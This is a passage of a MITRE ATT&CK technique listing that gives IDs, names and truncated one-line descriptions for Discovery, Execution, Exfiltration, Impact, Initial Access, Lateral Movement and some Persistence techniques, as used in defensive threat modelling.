Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as …
T1016.002
DiscoveryWi-Fi Discovery
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of …
T1018
DiscoveryRemote System Discovery
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used …
T1033
DiscoverySystem Owner/User Discovery
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is …
T1046
DiscoveryNetwork Service Discovery
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to …
T1049
DiscoverySystem Network Connections Discovery
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by …
T1057
DiscoveryProcess Discovery
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running …
T1063
DiscoverySecurity Software Discovery
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things …
T1069
DiscoveryPermission Groups Discovery
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of …
T1069.001
DiscoveryLocal Groups
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist …
T1069.002
DiscoveryDomain Groups
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which …
T1069.003
DiscoveryCloud Groups
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users …
T1082
DiscoverySystem Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use …
T1083
DiscoveryFile and Directory Discovery
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. …
T1087
DiscoveryAccount Discovery
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can …
T1087.001
DiscoveryLocal Account
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to …
T1087.002
DiscoveryDomain Account
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior …
T1087.003
DiscoveryEmail Account
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists …
T1087.004
DiscoveryCloud Account
Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote …
T1120
DiscoveryPeripheral Device Discovery
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices …
T1124
DiscoverySystem Time Discovery
An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by …
T1135
DiscoveryNetwork Share Discovery
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for …
T1201
DiscoveryPassword Policy Discovery
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to …
T1217
DiscoveryBrowser Information Discovery
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal …
T1482
DiscoveryDomain Trust Discovery
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts …
T1518
DiscoverySoftware Discovery
Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may …
T1518.001
DiscoverySecurity Software Discovery
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud …
T1518.002
DiscoveryBackup Software Discovery
Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape …
T1526
DiscoveryCloud Service Discovery
An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service …
T1538
DiscoveryCloud Service Dashboard
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, …
T1580
DiscoveryCloud Infrastructure Discovery
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, …
T1613
DiscoveryContainer and Resource Discovery
Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and …
T1614
DiscoverySystem Location Discovery
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) …
T1614.001
DiscoverySystem Language Discovery
Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information …
T1615
DiscoveryGroup Policy Discovery
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in …
T1619
DiscoveryCloud Storage Object Discovery
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific …
T1652
DiscoveryDevice Driver Discovery
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such …
T1654
DiscoveryLog Enumeration
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as …
T1673
DiscoveryVirtual Machine Discovery
An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list …
T1680
DiscoveryLocal Storage Discovery
Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to …
T1028
ExecutionWindows Remote Management
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system …
T1035
ExecutionService Execution
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be …
T1047
ExecutionWindows Management Instrumentation
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data …
T1053
ExecutionScheduled Task/Job
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs …
T1053.001
ExecutionAt (Linux)
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating …
T1053.002
ExecutionAt
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable …
T1053.003
ExecutionCron
Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The …
T1053.004
ExecutionLaunchd
This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with …
T1053.005
ExecutionScheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access …
T1053.006
ExecutionSystemd Timers
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension …
T1053.007
ExecutionContainer Orchestration Job
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container …
T1059
ExecutionCommand and Scripting Interpreter
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and …
T1059.001
ExecutionPowerShell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: …
T1059.002
ExecutionAppleScript
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called …
T1059.003
ExecutionWindows Command Shell
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command …
T1059.004
ExecutionUnix Shell
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many …
T1059.005
ExecutionVisual Basic
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component …
T1059.006
ExecutionPython
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be …
T1059.007
ExecutionJavaScript
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in …
T1059.008
ExecutionNetwork Device CLI
Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means …
T1059.009
ExecutionCloud API
Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access …
T1059.010
ExecutionAutoHotKey & AutoIT
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to …
T1059.011
ExecutionLua
Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua …
T1059.012
ExecutionHypervisor CLI
Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the …
T1059.013
ExecutionContainer CLI/API
Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments. The Docker CLI is used for managing containers via …
T1061
ExecutionGraphical User Interface
**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.** The Graphical User Interfaces (GUI) is a common way to interact with an operating …
T1072
ExecutionSoftware Deployment Tools
Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management …
T1086
ExecutionPowerShell
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform …
T1106
ExecutionNative API
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services …
T1129
ExecutionShared Modules
Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, …
T1153
ExecutionSource
**This technique has been deprecated and should no longer be used.** The <code>source</code> command loads functions into the current shell or executes files in the …
T1154
ExecutionTrap
The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing …
T1155
ExecutionAppleScript
macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local …
T1173
ExecutionDynamic Data Exchange
Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can …
T1177
ExecutionLSASS Driver
The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority …
T1203
ExecutionExploitation for Client Execution
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to …
T1204
ExecutionUser Execution
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them …
T1204.001
ExecutionMalicious Link
An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get …
T1204.002
ExecutionMalicious File
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get …
T1204.003
ExecutionMalicious Image
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) …
T1204.004
ExecutionMalicious Copy and Paste
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get …
T1204.005
ExecutionMalicious Library
Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and …
T1559
ExecutionInter-Process Communication
Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each …
T1559.001
ExecutionComponent Object Model
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application …
T1559.002
ExecutionDynamic Data Exchange
Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between …
T1559.003
ExecutionXPC Services
Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, …
T1569
ExecutionSystem Services
Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally …
T1569.001
ExecutionLaunchctl
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the …
T1569.002
ExecutionService Execution
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage …
T1569.003
ExecutionSystemctl
Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked …
T1609
ExecutionContainer Administration Command
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API …
T1648
ExecutionServerless Execution
Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, …
T1651
ExecutionCloud Administration Command
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to …
T1674
ExecutionInput Injection
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching …
T1675
ExecutionESXi Administration Command
Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such …
T1677
ExecutionPoisoned Pipeline Execution
Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: …
T1002
ExfiltrationData Compressed
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of …
T1011
ExfiltrationExfiltration Over Other Network Medium
Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a …
T1011.001
ExfiltrationExfiltration Over Bluetooth
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet …
T1020
ExfiltrationAutomated Exfiltration
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) When automated …
T1020.001
ExfiltrationTraffic Duplication
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used …
T1022
ExfiltrationData Encrypted
Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous …
T1029
ExfiltrationScheduled Transfer
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic …
T1030
ExfiltrationData Transfer Size Limits
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used …
T1041
ExfiltrationExfiltration Over C2 Channel
Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the …
T1048
ExfiltrationExfiltration Over Alternative Protocol
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be …
T1048.001
ExfiltrationExfiltration Over Symmetric Encrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data …
T1048.002
ExfiltrationExfiltration Over Asymmetric Encrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data …
T1048.003
ExfiltrationExfiltration Over Unencrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may …
T1052
ExfiltrationExfiltration Over Physical Medium
Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration …
T1052.001
ExfiltrationExfiltration over USB
Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via …
T1537
ExfiltrationTransfer Data to Cloud Account
Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the …
T1567
ExfiltrationExfiltration Over Web Service
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as …
T1567.001
ExfiltrationExfiltration to Code Repository
Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API …
T1567.002
ExfiltrationExfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, …
T1567.003
ExfiltrationExfiltration to Text Storage Sites
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used …
T1567.004
ExfiltrationExfiltration Over Webhook
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server …
T1485
ImpactData Destruction
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. …
T1485.001
ImpactLifecycle-Triggered Deletion
Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. Cloud storage buckets often allow users to set …
T1486
ImpactData Encrypted for Impact
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They …
T1487
ImpactDisk Structure Wipe
Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large …
T1488
ImpactDisk Content Wipe
Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to …
T1489
ImpactService Stop
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or …
T1490
ImpactInhibit System Recovery
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos …
T1491
ImpactDefacement
Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include …
T1491.001
ImpactInternal Defacement
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This …
T1491.002
ImpactExternal Defacement
An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) …
T1492
ImpactStored Data Manipulation
Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony …
T1493
ImpactTransmitted Data Manipulation
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ …
T1494
ImpactRuntime Data Manipulation
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ …
T1495
ImpactFirmware Corruption
Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render …
T1496
ImpactResource Hijacking
Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Resource hijacking may take a …
T1496.001
ImpactCompute Hijacking
Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. One common purpose for …
T1496.002
ImpactBandwidth Hijacking
Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Adversaries may also …
T1496.003
ImpactSMS Pumping
Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of …
T1496.004
ImpactCloud Service Hijacking
Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. For example, adversaries may leverage email and messaging …
T1498
ImpactNetwork Denial of Service
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed …
T1498.001
ImpactDirect Network Flood
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may …
T1498.002
ImpactReflection Amplification
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS …
T1499
ImpactEndpoint Denial of Service
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by …
T1499.001
ImpactOS Exhaustion Flood
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources …
T1499.002
ImpactService Exhaustion Flood
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and …
T1499.003
ImpactApplication Exhaustion Flood
Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in …
T1499.004
ImpactApplication or System Exploitation
Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some …
T1529
ImpactSystem Shutdown/Reboot
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot …
T1531
ImpactAccount Access Removal
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated …
T1561
ImpactDisk Wipe
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network …
T1561.001
ImpactDisk Content Wipe
Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network …
T1561.002
ImpactDisk Structure Wipe
Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large …
T1565
ImpactData Manipulation
Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant …
T1565.001
ImpactStored Data Manipulation
Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: …
T1565.002
ImpactTransmitted Data Manipulation
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of …
T1565.003
ImpactRuntime Data Manipulation
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of …
T1657
ImpactFinancial Theft
Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense …
T1667
ImpactEmail Bombing
Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business …
T1189
Initial AccessDrive-by Compromise
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code …
T1190
Initial AccessExploit Public-Facing Application
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be …
T1192
Initial AccessSpearphishing Link
Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of …
T1193
Initial AccessSpearphishing Attachment
Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware …
T1194
Initial AccessSpearphishing via Service
Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third …
T1195
Initial AccessSupply Chain Compromise
Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain …
T1195.001
Initial AccessCompromise Software Dependencies and Development Tools
Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often …
T1195.002
Initial AccessCompromise Software Supply Chain
Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software …
T1195.003
Initial AccessCompromise Hardware Supply Chain
Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware …
T1199
Initial AccessTrusted Relationship
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may …
T1200
Initial AccessHardware Additions
Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to …
T1566
Initial AccessPhishing
Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known …
T1566.001
Initial AccessSpearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of …
T1566.002
Initial AccessSpearphishing Link
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific …
T1566.003
Initial AccessSpearphishing via Service
Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of …
T1566.004
Initial AccessSpearphishing Voice
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other …
T1659
Initial AccessContent Injection
Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious …
T1669
Initial AccessWi-Fi Networks
Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target …
T1017
Lateral MovementApplication Deployment Software
Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary …
T1021
Lateral MovementRemote Services
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform …
T1021.001
Lateral MovementRemote Desktop Protocol
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on …
T1021.002
Lateral MovementSMB/Windows Admin Shares
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the …
T1021.003
Lateral MovementDistributed Component Object Model
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions …
T1021.004
Lateral MovementSSH
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH …
T1021.005
Lateral MovementVNC
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB …
T1021.006
Lateral MovementWindows Remote Management
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. …
T1021.007
Lateral MovementCloud Services
Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The …
T1021.008
Lateral MovementDirect Cloud VM Connections
Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to …
T1051
Lateral MovementShared Webroot
**This technique has been deprecated and should no longer be used.** Adversaries may add malicious content to an internally accessible website through an open network …
T1075
Lateral MovementPass the Hash
Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication …
T1076
Lateral MovementRemote Desktop Protocol
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user …
T1077
Lateral MovementWindows Admin Shares
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example …
T1080
Lateral MovementTaint Shared Content
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on …
T1091
Lateral MovementReplication Through Removable Media
Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when …
T1097
Lateral MovementPass the Ticket
Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can …
T1175
Lateral MovementComponent Object Model and Distributed COM
**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).** Adversaries may use the Windows Component Object Model (COM) and …
T1184
Lateral MovementSSH Hijacking
Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via …
T1210
Lateral MovementExploitation of Remote Services
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an …
T1534
Lateral MovementInternal Spearphishing
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise …
T1563
Lateral MovementRemote Service Session Hijacking
Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a …
T1563.001
Lateral MovementSSH Hijacking
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on …
T1563.002
Lateral MovementRDP Hijacking
Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It …
T1570
Lateral MovementLateral Tool Transfer
Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may …
T1004
PersistenceWinlogon Helper DLL
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows …
T1013
PersistencePort Monitors
